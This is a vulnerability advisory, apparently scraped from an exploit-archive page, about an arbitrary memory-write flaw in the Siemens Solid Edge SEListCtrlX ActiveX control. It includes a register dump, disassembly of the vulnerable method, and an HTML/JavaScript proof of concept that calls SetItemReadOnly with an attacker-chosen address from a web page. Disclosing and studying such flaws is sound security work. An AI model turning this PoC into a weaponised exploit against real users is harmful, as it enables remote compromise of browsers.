扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 |
SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution Vulnerability tested against: Microsoft Windows Server 2003 r2 sp2 Microsoft Windows XP sp3 Microsoft Windows 7 Internet Explorer 7/8 software description: http://en.wikipedia.org/wiki/Solid_Edge vendor site: http://www.siemens.com/entry/cc/en/ download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm file tested: SolidEdgeV104ENGLISH_32Bit.exe background: the mentioned software installs an ActiveX control with the following settings: ActiveX settings: ProgID: SELISTCTRLX.SEListCtrlXCtrl.1 CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D} binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx Safe For Scripting (Registry): True Safe For Initialization (Registry): True Vulnerability: This control exposes the SetItemReadOnly() method, see typelib: ... /* DISPID=14 */ function SetItemReadOnly( /* VT_VARIANT [12]*/ $hItem, /* VT_BOOL [11]*/ $bReadOnly ) { } ... (i) By setting to a memory address the first argument and the second one to 'false' you can write a NULL byte inside an arbitrary memory region. (ii) By setting to a memory address the first argument and the second one to 'true' you can write a \x08 byte inside an arbitrary memory region. Example crash: EAX 61616161 ECX 0417AB44 EDX 01B7F530 EBX 0000000C ESP 01B7F548 EBP 01B7F548 ESI 0417A930 EDI 027D5DD0 SEListCt.027D5DD0 EIP 033FD158 control.033FD158 C 0ES 0023 32bit 0(FFFFFFFF) P 1CS 001B 32bit 0(FFFFFFFF) A 0SS 0023 32bit 0(FFFFFFFF) Z 1DS 0023 32bit 0(FFFFFFFF) S 0FS 003B 32bit 7FFD9000(4000) T 0GS 0000 NULL D 0 O 0LastErr ERROR_SUCCESS (00000000) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF ST1 empty 3.3760355862290856960e-4932 ST2 empty +UNORM 48F4 00000000 00000000 ST3 empty -2.4061003025887744000e+130 ST4 empty -UNORM C198 00000000 00000000 ST5 empty 0.0 ST6 empty 1633771873.0000000000 ST7 empty 1633771873.0000000000 3 2 1 0E S P U O Z D I FST 4000Cond 1 0 0 0Err 0 0 0 0 0 0 0 0(EQ) FCW 027FPrec NEAR,53Mask1 1 1 1 1 1 Call stack of thread 000009B8 AddressStackProcedure / arguments Called from Frame 01B7F54C 027D5DF3 control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z SEListCt.027D5DED 01B7F548 01B7F560 787FF820 Includes SEListCt.027D5DF3mfc100u.787FF81E01B7F55C 01B7F56C 78807BF5 mfc100u.787FF810mfc100u.78807BF001B7F618 01B7F61C 78808312 ? mfc100u.78807A5Bmfc100u.7880830D01B7F618 vulnerable code, inside the close control.dll: ... ;------------------------------------------------------------------------------ Align 4 ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z: push ebp mov ebp,esp mov eax,[ebp+08h] test eax,eax jz L1011D15C cmp dword ptr [ebp+0Ch],00000000h jz L1011D158 or dword ptr [eax+2Ch],00000008h <-------------------- it crashes here pop ebp retn 0008h ;------------------------------------------------------------------------------ ... ... ;------------------------------------------------------------------------------ L1011D158: and dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here L1011D15C: pop ebp retn 0008h ;------------------------------------------------------------------------------ ... As attachment, code to reproduce the crash. <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' /> </object> <script language='javascript'> //obj.SetItemReadOnly(0x61616161,false); obj.SetItemReadOnly(0x61616161,true); </script> |
体验盒子
